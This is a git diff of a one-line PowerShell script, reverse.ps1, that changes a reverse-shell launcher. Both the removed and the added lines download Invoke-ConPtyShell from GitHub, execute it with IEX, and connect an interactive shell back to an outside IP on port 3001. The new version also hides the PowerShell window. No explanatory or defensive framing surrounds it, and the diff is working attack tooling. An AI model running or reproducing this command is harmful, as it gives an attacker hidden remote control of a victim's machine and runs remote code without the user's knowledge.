diff --git a/reverse.ps1 b/reverse.ps1 index b23982846c54c783723753df2b555fe4cec3433e..05fba426ff864936f4b0e95a63c50714b696c528 100644 --- a/reverse.ps1 +++ b/reverse.ps1 @@ -1 +1 @@ -IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 172.21.199.93 3001 \ No newline at end of file +PowerShell.exe -WindowStyle hidden {IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 172.21.200.144 3001}